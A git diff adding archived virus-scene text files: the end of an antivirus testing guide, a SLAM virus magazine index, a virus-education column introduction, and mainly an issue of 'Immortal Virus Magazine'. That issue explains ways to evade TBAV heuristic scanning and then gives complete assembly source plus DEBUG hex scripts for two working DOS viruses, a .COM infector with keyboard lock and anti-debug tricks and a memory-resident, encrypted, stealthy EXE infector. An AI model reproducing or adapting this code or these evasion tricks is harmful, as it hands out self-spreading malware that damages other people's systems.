+infected floppies.  Do this on a clean, uninfected system.  The
+program should identify the infection on each diskette.  Next
+cause the program to attempt removal.  Run each floppy in turn
+through the removal cycle.  The program should remove all of the
+infections.
+     To test that the removal worked, take the infected (and now
+hopefully disinfected) diskettes and again do a binary compare
+against the original backup diskettes.  There should be no
+discrepancy.
+     If the program has passed the above tests, it is clearly
+able to identify and, at least in test disks, remove the
+infection.  At this point you should test its operation on the
+infected system.  To do this, first make a backup copy of the
+product.  Then load the identification program into the infected
+system and begin the identification and disinfection process.
+     On completion of the operation, perform a disk compare of
+the working disk against the original product disk.  There should
+be no diferences.
+     In addition to these tests, you should review the criteria
+for these products that we discussed in the previous section and
+determine such factors as usability and performance.
+
diff --git a/textfiles.com/virus/index.mag b/textfiles.com/virus/index.mag
new file mode 100644
index 00000000..6afbd441
--- /dev/null
+++ b/textfiles.com/virus/index.mag
@@ -0,0 +1,29 @@
+                                   SLAM                January 1997
+                                   ----
+                                 MAGAZINE 
+                                 ISSUE 1!
+                                 ---  ---   
+                       -*<$The SLAM virus team!$>*-
+                          -*<$The X Document$>*-
+
+In this SLAM magazine:
+---------------------- 
+  SLAM.000      Introduction
+  SLAM.001      Membership and other info about SLAM
+  SLAM.002      First info about Macro virii (based on the Concept virus)
+  SLAM.003      Payloads in macro virii 
+  SLAM.004      Polymorphism in macro virii 
+  SLAM.005      Different stealth techniques in macro virii
+  SLAM.006      Anti-anti-virus (retro) in macro virii
+  SLAM.007      How to optimize your macro virus
+  SLAM.008      ExcelMacro/Laroux virus info
+  SLAM.009      WordMacro/MooNRaiDer virus
+  SLAM.010	WordMacro/Outlaw virus
+  SLAM.011      WordMacro/Puritan (1) virus
+  SLAM.012      WordMacro/Rapi virus
+  SLAM.013      Thankz & Greetz
+  SLAM.014      What's next?
+  SLAM.015      Decrypt your encrypted macros with this program
+
+
+                     --- The SLAM Virus Team ---
diff --git a/textfiles.com/virus/intro1.cvp b/textfiles.com/virus/intro1.cvp
new file mode 100644
index 00000000..8972bca8
--- /dev/null
+++ b/textfiles.com/virus/intro1.cvp
@@ -0,0 +1,49 @@
+INTRO1.CVP   910701 rev. 911102
+        Introduction to Computer Viral Programs Column
+
+This file/posting/column, and the ones which will follow, are a
+weekly column devoted to explaining computer viral type
+programs.  The material can be roughly divided into the
+following topic areas: Introduction (this file), History,
+Functions, Protection and Implications.  The file names will
+reflect this division, beginning with DEF, HIS, FUN, PRT or IMP,
+continuing with a further three letter subcategory, as
+appropriate, a sequence number, and all ending with CVP.
+
+The format is intended to be as easy as possible for all mail
+systems and terminals to handle.  Each "column" will be
+approximately one typewritten page in length.
+
+The material is intended to be "non system specific", and to be
+applicable to all type of computer and operating systems. 
+Examples will be given from many different computers and
+operating systems at different times.  Readers will note,
+however, that much of the material relates to the MS-DOS
+"world": IBM compatible microcomputers.  This is deliberately
+chosen.  The "PC" platform demonstrates the concepts that are
+common to all computer systems in the clearest manner.
+
+I retain copyright of this material.  Anyone is free to post any
+of this material on any publicly accessible electronic bulletin
+board or electronic mail system which does not charge for
+connect time or data transfer, provided that the files/postings
+are posted intact, including my copyright notice, the filename
+and date at the beginning and end and my contact addresses. 
+Anyone wishing to post this material on a commercial system, or
+to print it in a book or periodical, please contact me, and I'm
+sure we can work something out.
+
+I am sure that the material will be archived at various servers,
+but the one place that I can guarantee the complete set will be
+available is on the Cyberstore information system.  This is a
+commercial system, but is accessible through a local call to a
+Datapac or Tymnet node for most people in Canada and the United
+States, or indeed for anyone with an X.25/X.75 network.
+
+Vancouver          Usenet:    p1@arkham.wimsey.bc.ca
+Institute for      Internet:  Robert_Slade@mtsg.sfu.ca
+Research into      Cyberstore:Datapac [3020] 8350 1030
+User               Snailnet:  Canada V7K 2G6
+Security           Fidonet:   1:153/915
+
+copyright Robert M. Slade, 1991   INTRO1.CVP   910701 rev. 911102 
\ No newline at end of file
diff --git a/textfiles.com/virus/ivm-95.1 b/textfiles.com/virus/ivm-95.1
new file mode 100644
index 00000000..129da8d0
--- /dev/null
+++ b/textfiles.com/virus/ivm-95.1
@@ -0,0 +1,3376 @@
+------------------------------Immortal Virus Magazine-------------------------
+-----------------------------------Issue 95.1----------------------------------
+-----------------------------TBAV fooling techiniques--------------------------
+
+The heuristic scans we will discuss are:
+
+ - F : Suspicious file-access
+ - S : Search for .EXE / .COM files
+ - D : Direct disk access
+ - # : Encryption and/or debugger trap
+ - G : Grabage instructions
+ - E : Flexible entrypoint
+-------------------------------------------------------------------------------
+- F : Suspicious file-access
+
+ There are different ways to fool TBAV on this one.
+1.) The easiest way is to add 10 or something at the MOVe instruction
+     and then SUBstract 10: TBAV will think you use the original MOVe.
+      e.g:   MOV  AH, 50h
+             SUB  AH, 10h       ;50h will turn into 40h Dos fnc: Write
+             INT  21h
+
+2.) This is a bit tougher, you redirect int 21h to some other unused
+     interrupt. There is no need to unlink the new interrupt.
+
+      e.g:   MOV  AX, 3521h     ;Get dos int address in ES:BX
+             INT  21H
+             PUSH ES            ;DS == ES
+             POP  DS
+             MOV  AX, 2560h     ;Int 60H will become int 21h
+             INT  21h
+             MOV  AH, 40h       ;Dos fnc: Write
+             INT  60h           ;The new interrupt
+-------------------------------------------------------------------------------
+- S : Search for .EXE / .COM files
+
+ There are again a few ways to fool TBAV on this one.
+1.) Somewhere in your virus is a filespec (e.g. '*.COM'), just change the
+     '*' into something else ('Z.COM') and when the function 3Fh or something
+     is called change it to a '*' again, afterwards change it to a 'Z' again.
+
+      e.g:   MOV  BYTE PTR [FSPC+BP],'*' 
+             MOV  AX,3F00h
+             INT  21h
+             MOV  BYTE PTR [FSPC+BP],'Z'
+
+             FSPC DB 'Z.COM',0
+
+2.) You can also use the first technique about hiding the 'F' flag.
+-------------------------------------------------------------------------------
+- D : Direct disk access
+
+ Once again there are a few ways to let TBAV eat his 'D' flag.
+1.) Change the INT 26h realtime: Create a label or something and put
+     an int 21h or something, and change it to int 26h in your virus.
+
+      e.g.   MOV  BYTE PTR [I26L+1+BP],26h      ;Change INT 21h to INT 26h
+       I26L: INT  21h                           ;Here will be the INT 26h
+             MOV  BYTE PTR [I26L+1+BP],21h      ;Change INT 26h to INT 21h
+
+2.) You can also use the second technique about hiding the 'F' flag.
+-------------------------------------------------------------------------------
+- # : Encryption and/or debugger trap
+
+ Once again there are several ways to shit TBAV.
+1.) For a debugger trap you can use the first techinique about the 'F' flag.
+2.) Use an unlogic call stucture. First CALL the decryption routine, then
+     JuMP to the main virus.
+
+      e.g.   CALL  DC                   ;Call your decryption routine
+             JMP   ST                   ;JuMP to the start of your virus
+             NOP                        ;To fool TBAV
+         ST: .                          ;Put your virus here
+             .
+             .
+         DC: RET                        ;Put the decryption routine here!
+-------------------------------------------------------------------------------
+- G : Garbage instructions
+
+ There's one thing to do to get rid of this flag.
+             OPTIMIZE!
+      e.g.   You can turn turn two nops into two eXCHanGes:
+             NOP
+             NOP
+             will be:
+             XCHG  AX,BX
+             XCHG  CX,AX
+             or something like that.
+ You can also put often used routines in a CALL routine (e.g. Get Time,etc)
+-------------------------------------------------------------------------------
+- E : Flexible entry-point
+
+ There are many ways to avoid this, the best one is to put this little
+  routine at the beginning of your virus:
+
+             XCHG  AX,BX                ;Avoid 'G' & 'E' flags
+             XCHG  CX,AX
+             CALL  DELTA
+  DELTA:     POP   BP
+             SUB   BP, OFFSET DELTA
+
+             Entrypoint will be in BP
+-------------------------------------------------------------------------------
+By: [Hacking Hell]------------------------------Immortal Virus Magazine-------------------------
+-----------------------------------Issue 95.1----------------------------------
+--------------------------The basics of a .COM infector------------------------
+
+We'll begin with the search .COM routine of a virus.
+ The best way is to to use function 4Eh & 4Fh.
+- Function 4Eh  Find First file
+   Inputs:      It needs a DTA set.
+                DS:DX = Filespec
+                BX    = Attribute
+   Outputs:     DTA + 1Eh = Filename + 0 byte
+- Function 4Fh  Find next file
+   Inputs:      By function 4Eh or 4Fh pre-initiated DTA
+   Outputs:     DTA + 1Eh = Filename + 0 byte
+
+Now, the implementation technique.
+ I think the best way is to make a four byte jump table and an original bytes
+  table, the jump table exists out of an 0E9h byte, two 00h bytes and an
+  identification byte (eg. DB 0E9h,00h,00h,'C'), in the original bytes
+  table the first four bytes will be stored. First read the original bytes,
+  store then in the org. bytes table, append then virus at the end, calculate
+  the jump offset, place them in the jump table, write the jump table at the
+  beginning of the victim file.
+
+- Function 3Dh  Open file
+   Inputs:      AL    = Mode ( 02h = Random access )
+                DS:DX = Filename ( eg. DTA + 1Eh )
+   Outputs:     AX    = File-handle ( eXCHanGe to BX for other functions )
+
+- Function 3Fh  Read from file
+   Inputs:      CX    = Bytes to read
+                DS:DX = Destination of read
+                BX    = File-handle
+
+- Function 42h  Set file-pointer
+                AL    = Mode ( 00h = From SOF / 02h = From EOF)
+                DX:CX = Offset in file (0:0 for SOF / EOF)
+
+- Function 40h  Write into file
+                CX    = Bytes to write
+                DS:DX = Offset of data to write
+                BX    = File-handle
+
+- Function 3Eh  Close file
+                BX    = File-handle
+
+ Now here follows the assembly source and a debug script of the Conjurer Basic
+  virus, created by [Hacking Hell] & [Cyborg], it's 270 bytes large and a good
+  example virus for the techniques you may have learned...
+
+-------------------------------------<CUT>-------------------------------------
+; Conjurer.BASIC virus...
+
+%OUT    CoNJuReR.BASIC virus by [Hacking Hell] & [Cyborg]
+%OUT    Appending non-descructive non-resident non-flagged virus.
+%OUT   Features:
+%OUT    - Anti trace meganism
+%OUT    - 99% TBAV proof (almost no flags)
+%OUT    - Traversal (DotDot technique)
+%OUT    - Little message
+%OUT    - 13% chance for a keyboard lock
+
+.model  tiny
+.code
+
+	ORG     100h                    ;COM file remember?!?
+
+dummy:  db      0e9h,02h,00h            ;The dummy host: jump to START
+	db      'C'                     ;Already infected marker
+	ret                             ;Exit from dummy
+
+start:  push    cx                      ;Some junk to fool TBAV
+	pop     bx
+
+	mov     ax,0fa01h               ;Let's take down MSAV!!!
+	mov     dx,05945h
+	int     16h
+
+	call    getdlt                  ;Nice way to get delta offset!
+realst:
+getdlt: pop     bp
+	sub     bp, offset getdlt
+	call    encdec
+	jmp     codest
+
+	nop                             ;TBAV eats '#'
+
+codest: lea     si,[orgbts+bp]          ;Restore first 4 bytes
+	mov     di,0100h
+	movsw
+	movsw
+
+	push    cs                      ;DS <==> CS
+	pop     ds
+
+	lea     dx,[eov+bp]             ;Set DTA address
+	mov     ah,1ah
+	int     21h
+
+	mov     ax,3501h                ;Crash INT 1
+	sub     ah,10h
+	mov     bx,0000h
+	mov     es,bx
+	int     21h
+
+	mov     al,03h                  ;Crash INT 3
+	int     21h
+
+	mov     ah,2ch                  ;13% chance to lock keyboard!
+	int     21h
+	cmp     dl, 0dh
+	jg      nolock
+
+lockkb: mov     al,82h                  ;Keyboard lock!
+	out     21h,al
+
+nolock: mov     ah,2ch                  ;50% chance to print message!
+	int     21h
+	cmp     dl,32h
+	jl      spread
+
+	mov     ah,09h                  ;Bingo! print message!
+	lea     dx, [bp+offset welcome]
+	int     21h
+	mov     ah,00h                  ;Wait for a key!
+	int     16h
+	jmp     spread
+
+welcome db 'CoNJuReR.BSC!',07h,0ah,0dh,'$';Ever seen a DB in the middle of a file?
+
+spread: mov     byte ptr [infcnt+bp],0
+spraed: mov     ah,4eh                  ;Findfirst
+	lea     dx,[fspec+bp]           ;Filespec=*.COM
+
+fnext:  cmp     byte ptr [infcnt+bp],5
+	je      re_dta
+
+	int     21h
+	jc      dotdot                  ;No files found
+	call    infect
+
+nextf:  mov     ah,4fh                  ;Find next file
+	jmp     fnext
+
+dotdot: lea     dx,[offset dotspec+bp]
+	mov     ax,3b00h
+	int     21h
+	jnc     spraed
+
+re_dta: mov     ah,1ah                  ;Reset DTA
+	mov     dx,0080h
+	int     21h
+
+	mov     di,0100h                ;Return control to original file!
+	push    di
+	ret
+
+
+fspec   db      '*.com',0
+infcnt  db      0
+dotspec db      '..',0
+jmptbl  db      0e9h,02h,00h,'C'
+orgbts: db      90h,90h,90h,90h
+eoe:
+infect: lea     dx,[eov+1eh+bp]         ;Open file
+	mov     ax,3d02h
+	int     21h
+
+	jc      nextf                   ;Error opening file, next!
+
+	xchg    bx,ax
+
+	mov     cx,0004h                ;Read first 4 bytes for check
+	mov     ah,3fh                  ; if already infected!
+	lea     dx,[orgbts+bp]
+	int     21h
+
+	cmp     byte ptr [orgbts+bp+3],'C' ;Already infected
+	jz      shutit
+
+	mov     ax,4202h                ;Goto eof
+	sub     cx,cx                   ;2 byte version of mov cx,0!!
+	cwd                             ;1 byte version of mov dx,0!!
+	int     21h
+
+	sub     ax,0003h                ;Use our jmp table
+	mov     word ptr [bp+jmptbl+1],ax
+
+	mov     ah,40h                  ;Implend our viral code into victim
+	mov     cx,eov-start
+	lea     dx,[bp+start]
+	int     21h
+
+	mov     ax,4200h                ;Goto SOF
+	sub     cx,cx
+	cwd
+	int     21h
+
+	mov     ah,40h                  ;Write first four bytes over
+	mov     cx,0004h                ; the original
+	lea     dx,[bp+jmptbl]
+	int     21h
+
+	inc     byte ptr [infcnt+bp]
+
+shutit: mov     ah,3eh                  ;Close victim
+	int     21h
+	ret
+encdec: ret                             ;No encryption support yet...
+eov:
+end     dummy
+-------------------------------------<CUT>------------------------------------
+Now the DEBUG script for all of you who don't have an assembler!
+-------------------------------------<CUT>------------------------------------
+N CONJURER.COM
+E 0100 E9 02 00 43 C3 51 5B B8 01 FA BA 45 59 CD 16 E8
+E 0110 00 00 5D 81 ED 12 01 E8 F8 00 EB 02 90 90 8D B6
+E 0120 BA 01 BF 00 01 A5 A5 0E 1F 8D 96 13 02 B4 1A CD
+E 0130 21 B8 01 35 80 EC 10 BB 00 00 8E C3 CD 21 B0 03
+E 0140 CD 21 B4 2C CD 21 80 FA 0D 7F 04 B0 82 E6 21 B4
+E 0150 2C CD 21 80 FA 32 7C 20 B4 09 8D 96 67 01 CD 21
+E 0160 B4 00 CD 16 EB 12 90 43 6F 4E 4A 75 52 65 52 2E
+E 0170 42 53 43 21 07 0A 0D 24 C6 86 B2 01 00 B4 4E 8D
+E 0180 96 AC 01 80 BE B2 01 05 74 16 CD 21 72 07 E8 2D
+E 0190 00 B4 4F EB EE 8D 96 B3 01 B8 00 3B CD 21 73 DD
+E 01A0 B4 1A BA 80 00 CD 21 BF 00 01 57 C3 2A 2E 63 6F
+E 01B0 6D 00 00 2E 2E 00 E9 02 00 43 90 90 90 90 8D 96
+E 01C0 31 02 B8 02 3D CD 21 72 C8 93 B9 04 00 B4 3F 8D
+E 01D0 96 BA 01 CD 21 80 BE BD 01 43 74 31 B8 02 42 2B
+E 01E0 C9 99 CD 21 2D 03 00 89 86 B7 01 B4 40 B9 0E 01
+E 01F0 8D 96 05 01 CD 21 B8 00 42 2B C9 99 CD 21 B4 40
+E 0200 B9 04 00 8D 96 B6 01 CD 21 FE 86 B2 01 B4 3E CD
+E 0210 21 C3 C3
+
+RCX
+113
+W
+Q
+-------------------------------------<CUT>------------------------------------
+------------------------------------------------------------------------------
+
+By: [Hacking Hell]------------------------------Immortal Virus Magazine--------------------------
+-----------------------------------Issue 95.1----------------------------------
+-----------------------------------Virus Labs----------------------------------
+ 
+ In this section I will test a Virus Lab, this section will return every
+  issue.
+ In this issue:
+
+Biological Warfare v0.90� by MnemoniX
+
+Some features of this great package:
+ + Resident
+ + Encryption
+ + (Extended) dir stealth
+ + COM and/or EXE infections
+ + Int 24h handler
+ + Anti - Trace code
+ + Traverse directory
+ + Infections per run can be set to unlimited
+ + Check for COM size
+ + Check for COMMAND.COM
+ + Random .EXE marker
+ + .EXE overlay check
+
+Some weaknesses about Biological Warfare:
+ - 'Log-in' password
+ - Easy to detect
+ - No 'configuration files'
+
+The viruses can be made resident, when they are, you can make it infect files
+ on: Execution and/or opening of .COM / .EXE files. The encryption is pretty
+ good. The anti-trace code works. There really is not much to say about this
+ wonderfull package!  Version 1.00 also has a polymorphic engine!
+
+        Score: 8.7
+Btw. The log-in password is Lo-Tek
+-------------------------------------<CUT>-------------------------------------
+; Here is an example of a virus created by Biological Warefare:
+; Features:
+;  - TSR
+;  - EXE infector
+;  - Extended DIR stealth
+;  - Encrypted
+;  - Spread on execution of virus
+;Have Fun!
+; IVM-Vir.ASM : Download IVM, it's a good magazine (WHQ: +31 (0)77-547477)
+; Created with Biological Warfare - Version 0.90� by MnemoniX
+
+PING            equ     0EA93h
+PONG            equ     080Eh
+STAMP           equ     25
+MARKER          equ     04945h
+
+code            segment
+                org     0
+                assume  cs:code,ds:code
+
+start:
+                db      0E9h,3,0          ; to virus
+host:
+                db      0CDh,20h,0        ; host program
+virus_begin:
+
+                db      0BBh                    ; decryption module
+code_offset     dw      offset virus_code
+                mov     di,VIRUS_SIZE / 2 + 1
+
+decrypt:
+                db      02Eh,081h,2Fh           ; SUB CS:[BX]
+cipher          dw      0
+                inc     bx
+                inc     bx
+                dec     di
+                jnz     decrypt
+
+
+virus_code:
+                call    $ + 3             ; BP is instruction ptr.
+                pop     bp
+                sub     bp,offset $ - 1
+
+                push    ds es
+
+                cli
+                mov     ax,PING           ; mild anti-trace code
+                push    ax
+                pop     ax
+                dec     sp
+                dec     sp
+                pop     bx
+                cmp     ax,bx
+                je      no_trace
+                hlt
+
+no_trace:
+                sti
+                in      al,21h            ; lock out & reopen keyboard
+                xor     al,2
+                out     21h,al
+                xor     al,2
+                out     21h,al
+
+                mov     ax,PING           ; test for residency
+                int     21h
+                cmp     dx,PONG
+                je      installed
+
+                mov     ax,es                   ; Get PSP
+                dec     ax
+                mov     ds,ax                   ; Get MCB
+
+                sub     word ptr ds:[3],((MEM_SIZE+1023) / 1024) * 64
+                sub     word ptr ds:[12h],((MEM_SIZE+1023) / 1024) * 64
+                mov     es,word ptr ds:[12h]
+
+                push    cs                      ; copy virus into memory
+                pop     ds
+                xor     di,di
+                mov     si,bp
+                mov     cx,(virus_end - start) / 2 + 1
+                rep     movsw
+
+                xor     ax,ax                   ; capture interrupts
+                mov     ds,ax
+
+                sub     word ptr ds:[413h],(MEM_SIZE+1023) / 1024
+
+                mov     si,21h * 4              ; get original int 21
+                mov     di,offset old_int_21
+                movsw
+                movsw
+
+                mov     word ptr ds:[si - 4],offset new_int_21
+                mov     ds:[si - 2],es          ; and set new int 21
+
+installed:
+                call    activate                ; activation routine
+
+                pop     es ds                   ; restore segregs
+exe_exit:
+                mov     ax,ds                   ; fix up return address
+                add     ax,10h
+                push    ax
+                add     ax,cs:[bp + exe_cs]
+                mov     cs:[bp + return_cs],ax
+
+                mov     ax,cs:[bp + exe_ip]
+                mov     cs:[bp + return_ip],ax
+
+                pop     ax
+                add     ax,cs:[bp + exe_ss]        ; restore stack
+                cli
+                mov     ss,ax
+                mov     sp,cs:[bp + exe_sp]
+
+                call    fix_regs                ; fix up registers
+                sti
+
+                db      0EAh                    ; back to host program
+return_ip       dw      0
+return_cs       dw      0
+
+exe_cs          dw      -16                     ; orig CS:IP
+exe_ip          dw      103h
+exe_sp          dw      -2                      ; orig SS:SP
+exe_ss          dw      -16
+
+fix_regs:
+                xor     ax,ax
+                cwd
+                xor     bx,bx
+                mov     si,100h
+                xor     di,di
+                xor     bp,bp
+                ret
+
+; interrupt 21 handler
+int_21:
+                pushf
+                call    dword ptr cs:[old_int_21]
+                ret
+
+new_int_21:
+                cmp     ax,PING                 ; residency test
+                je      ping_pong
+                cmp     ah,11h                  ; directory stealth
+                je      dir_stealth
+                cmp     ah,12h
+                je      dir_stealth
+                cmp     ah,4Eh                  ; directory stealth
+                je      dir_stealth_2
+                cmp     ah,4Fh
+                je      dir_stealth_2
+                cmp     ax,4B00h                ; execute program
+                jne     int_21_exit
+                jmp     execute
+int_21_exit:
+                db      0EAh                    ; never mind ...
+old_int_21      dd      0
+
+ping_pong:
+                mov     dx,PONG
+                iret
+
+dir_stealth:
+                call    int_21                  ; get dir entry
+                test    al,al
+                js      dir_stealth_done
+
+                push    ax bx es
+                mov     ah,2Fh
+                int     21h
+
+                cmp     byte ptr es:[bx],-1     ; check for extended FCB
+                jne     no_ext_FCB
+                add     bx,7
+no_ext_FCB:
+                mov     ax,es:[bx + 17h]        ; check for infection marker
+                and     al,31
+                cmp     al,STAMP
+                jne     dir_fixed
+
+                sub     word ptr es:[bx + 1Dh],VIRUS_SIZE + 3
+                sbb     word ptr es:[bx + 1Fh],0
+dir_fixed:
+                pop     es bx ax
+dir_stealth_done:
+                iret
+
+dir_stealth_2:
+                pushf
+                call    dword ptr cs:[old_int_21]
+                jc      dir_stealth_done_2
+
+check_infect2:
+                push    ax bx es
+
+                mov     ah,2Fh
+                int     21h
+                mov     ax,es:[bx + 16h]
+                and     al,31                   ; check timestamp
+                cmp     al,STAMP
+                jne     fixed_2
+
+                sub     es:[bx + 1Ah],VIRUS_SIZE + 3
+                sbb     word ptr es:[bx + 1Ch],0
+
+fixed_2:
+                pop     es bx ax
+                clc                             ; clear carry
+dir_stealth_done_2:
+                retf    2
+execute:
+                push    ax bx cx dx si di ds es
+
+                xor     ax,ax                   ; critical error handler
+                mov     es,ax                   ; routine - catch int 24
+                mov     es:[24h * 4],offset int_24
+                mov     es:[24h * 4 + 2],cs
+
+                mov     ax,4300h                ; change attributes
+                int     21h
+
+                push    cx dx ds
+                xor     cx,cx
+                call    set_attributes
+
+                mov     ax,3D02h                ; open file
+                int     21h
+                jc      cant_open
+                xchg    bx,ax
+
+                push    cs                      ; CS = DS
+                pop     ds
+
+                mov     ax,5700h                ; save file date/time
+                int     21h
+                push    cx dx
+                mov     ah,3Fh
+                mov     cx,28
+                mov     dx,offset read_buffer
+                int     21h
+
+                cmp     word ptr read_buffer,'ZM' ; .EXE?
+                je      infect_exe              ; yes, infect as .EXE
+
+                jmp     dont_infect
+
+fix_date_time:
+                pop     dx cx
+                and     cl,-32                  ; add time stamp
+                or      cl,STAMP                ; for directory stealth
+                mov     ax,5701h                ; restore file date/time
+                int     21h
+
+close:
+                pop     ds dx cx                ; restore attributes
+                call    set_attributes
+
+                mov     ah,3Eh                  ; close file
+                int     21h
+
+cant_open:
+                pop     es ds di si dx cx bx ax
+                jmp     int_21_exit             ; leave
+
+
+set_attributes:
+                mov     ax,4301h
+                int     21h
+                ret
+
+dont_infect:
+                pop     cx dx                   ; can't infect, skip
+                jmp     close
+
+infect_exe:
+                cmp     word ptr read_buffer[26],0
+                jne     dont_infect             ; overlay, don't infect
+
+                cmp     word ptr read_buffer[16],MARKER
+                je      dont_infect             ; infected already
+
+                les     ax,dword ptr read_buffer[20]
+                mov     exe_cs,es               ; CS
+                mov     exe_ip,ax               ; IP
+
+                les     ax,dword ptr read_buffer[14]
+                mov     exe_ss,ax               ; SS
+                mov     exe_sp,es               ; SP
+                mov     word ptr read_buffer[16],MARKER
+
+                mov     ax,4202h                ; to end of file
+                cwd
+                xor     cx,cx
+                int     21h
+
+                push    ax dx                   ; save file size
+
+                push    bx
+                mov     cl,12                   ; calculate offsets for CS
+                shl     dx,cl                   ; and IP
+                mov     bx,ax
+                mov     cl,4
+                shr     bx,cl
+                add     dx,bx
+                and     ax,15
+                pop     bx
+
+                sub     dx,word ptr read_buffer[8]
+                mov     word ptr read_buffer[22],dx
+                mov     word ptr read_buffer[20],ax
+                add     dx,100
+                mov     word ptr read_buffer[14],dx
+
+                pop     dx ax                   ; calculate prog size
+
+                add     ax,VIRUS_SIZE + 3
+                adc     dx,0
+                mov     cx,512                  ; in pages
+                div     cx                      ; then save results
+                inc     ax
+                mov     word ptr read_buffer[2],dx
+                mov     word ptr read_buffer[4],ax
+                mov     dx,word ptr read_buffer[20]
+                call    encrypt_code            ; encrypt virus
+
+
+                mov     ah,40h
+                mov     cx,VIRUS_SIZE + 3
+                mov     dx,offset encrypt_buffer
+                int     21h
+
+
+                mov     ax,4200h                ; back to beginning
+                cwd
+                xor     cx,cx
+                int     21h
+
+                mov     ah,40h                  ; and fix up header
+                mov     cx,28
+                mov     dx,offset read_buffer
+                int     21h
+                jmp     fix_date_time           ; done
+
+courtesy_of     db      '[BW]',0
+signature       db      'Download IVM, its a good magazine (WHQ: +31 (0)77-547477)',0
+birthday        db      'Happy birthday [Hacking Hell] !!',0Ah,0Dh,'$',0
+
+activate:       mov     ah,2ah
+                cmp     dx,0B08h
+                jne     exit_act
+                mov     ah, 09h
+                lea     dx, [offset birthday+bp]
+                int     21h
+       ; Insert your routine here
+exit_act:       ret
+
+encrypt_code:
+                push    ax cx
+
+                push    dx
+                xor     ah,ah                   ; get time for random number
+                int     1Ah
+
+                mov     cipher,dx               ; save encryption key
+                pop     cx
+                add     cx,virus_code - virus_begin
+                mov     code_offset,cx          ; save code offset
+
+                push    cs                      ; ES = CS
+                pop     es
+
+                mov     si,offset virus_begin   ; move decryption module
+                mov     di,offset encrypt_buffer
+                mov     cx,virus_code - virus_begin
+                rep     movsb
+
+                mov     cx,VIRUS_SIZE / 2 + 1
+encrypt:
+                lodsw                           ; encrypt virus code
+                add     ax,dx
+                stosw
+                loop    encrypt
+
+                pop     cx ax
+                ret
+
+int_24:
+                mov     al,3                    ; int 24 handler
+                iret
+virus_end:
+VIRUS_SIZE      equ     virus_end - virus_begin
+read_buffer     db      28 dup (?)              ; read buffer
+encrypt_buffer  db      VIRUS_SIZE dup (?)      ; encryption buffer
+
+end_heap:
+
+MEM_SIZE        equ     end_heap - start
+
+code            ends
+                end     start
+-------------------------------------<CUT>-------------------------------------
+N IVM-VIR.COM
+E 0100 E9 03 00 CD 20 00 BB 16 00 BF 80 01 2E 81 2F 00
+E 0110 00 43 43 4F 75 F6 E8 00 00 5D 81 ED 19 00 1E 06 
+E 0120 FA B8 93 EA 50 58 4C 4C 5B 3B C3 74 01 F4 FB E4 
+E 0130 21 34 02 E6 21 34 02 E6 21 B8 93 EA CD 21 81 FA
+E 0140 0E 08 74 3A 8C C0 48 8E D8 81 2E 03 00 80 00 81 
+E 0150 2E 12 00 80 00 8E 06 12 00 0E 1F 33 FF 8B F5 B9 
+E 0160 83 01 F3 A5 33 C0 8E D8 83 2E 13 04 02 90 BE 84 
+E 0170 00 BF F2 00 A5 A5 C7 44 FC D0 00 8C 44 FE E8 43
+E 0180 02 07 1F 8C D8 05 10 00 50 2E 03 86 B4 00 2E 89 
+E 0190 86 B2 00 2E 8B 86 B6 00 2E 89 86 B0 00 58 2E 03 
+E 01A0 86 BA 00 FA 8E D0 2E 8B A6 B8 00 E8 0E 00 FB EA 
+E 01B0 00 00 00 00 F0 FF 03 01 FE FF F0 FF 33 C0 99 33 
+E 01C0 DB BE 00 01 33 FF 33 ED C3 9C 2E FF 1E F2 00 C3 
+E 01D0 3D 93 EA 74 21 80 FC 11 74 20 80 FC 12 74 1B 80 
+E 01E0 FC 4E 74 46 80 FC 4F 74 41 3D 00 4B 75 03 EB 65 
+E 01F0 90 EA 00 00 00 00 BA 0E 08 CF E8 CC FF 84 C0 78 
+E 0200 28 50 53 06 B4 2F CD 21 26 80 3F FF 75 03 83 C3 
+E 0210 07 26 8B 47 17 24 1F 3C 19 75 0B 26 81 6F 1D 01
+E 0220 03 26 83 5F 1F 00 07 5B 58 CF 9C 2E FF 1E F2 00 
+E 0230 72 20 50 53 06 B4 2F CD 21 26 8B 47 16 24 1F 3C
+E 0240 19 75 0B 26 81 6F 1A 01 03 26 83 5F 1C 00 07 5B
+E 0250 58 F8 CA 02 00 50 53 51 52 56 57 1E 06 33 C0 8E 
+E 0260 C0 26 C7 06 90 00 01 03 26 8C 0E 92 00 B8 00 43 
+E 0270 CD 21 51 52 1E 33 C9 E8 48 00 B8 02 3D CD 21 72 
+E 0280 36 93 0E 1F B8 00 57 CD 21 51 52 B4 3F B9 1C 00 
+E 0290 BA 04 03 CD 21 81 3E 04 03 4D 5A 74 2F EB 29 90 
+E 02A0 5A 59 80 E1 E0 80 C9 19 B8 01 57 CD 21 1F 5A 59 
+E 02B0 E8 0F 00 B4 3E CD 21 07 1F 5F 5E 5A 59 5B 58 E9
+E 02C0 2F FF B8 01 43 CD 21 C3 59 5A EB E1 83 3E 1E 03 
+E 02D0 00 75 F5 81 3E 14 03 45 49 74 ED C4 06 18 03 8C 
+E 02E0 06 B4 00 A3 B6 00 C4 06 12 03 A3 BA 00 8C 06 B8 
+E 02F0 00 C7 06 14 03 45 49 B8 02 42 99 33 C9 CD 21 50 
+E 0300 52 53 B1 0C D3 E2 8B D8 B1 04 D3 EB 03 D3 25 0F 
+E 0310 00 5B 2B 16 0C 03 89 16 1A 03 A3 18 03 83 C2 64 
+E 0320 89 16 12 03 5A 58 05 01 03 90 83 D2 00 B9 00 02
+E 0330 F7 F1 40 89 16 06 03 A3 08 03 8B 16 18 03 E8 94 
+E 0340 00 B4 40 B9 01 03 90 BA 20 03 CD 21 B8 00 42 99 
+E 0350 33 C9 CD 21 B4 40 B9 1C 00 BA 04 03 CD 21 E9 3F
+E 0360 FF 5B 42 57 5D 00 44 6F 77 6E 6C 6F 61 64 20 49 
+E 0370 56 4D 2C 20 69 74 73 20 61 20 67 6F 6F 64 20 6D
+E 0380 61 67 61 7A 69 6E 65 20 28 57 48 51 3A 20 2B 33 
+E 0390 31 20 28 30 29 37 37 2D 35 34 37 34 37 37 29 00 
+E 03A0 48 61 70 70 79 20 62 69 72 74 68 64 61 79 20 5B 
+E 03B0 48 61 63 6B 69 6E 67 20 48 65 6C 6C 5D 20 21 21 
+E 03C0 0A 0D 24 00 B4 2A 81 FA 08 0B 75 08 B4 09 8D 96 
+E 03D0 A0 02 CD 21 C3 50 51 52 32 E4 CD 1A 89 16 0F 00 
+E 03E0 59 83 C1 10 89 0E 07 00 0E 07 BE 06 00 BF 20 03 
+E 03F0 B9 10 00 F3 A4 B9 80 01 AD 03 C2 AB E2 FA 59 58
+E 0400 C3 B0 03 CF
+RCX
+0304
+W
+Q
+-------------------------------------<CUT>-------------------------------------
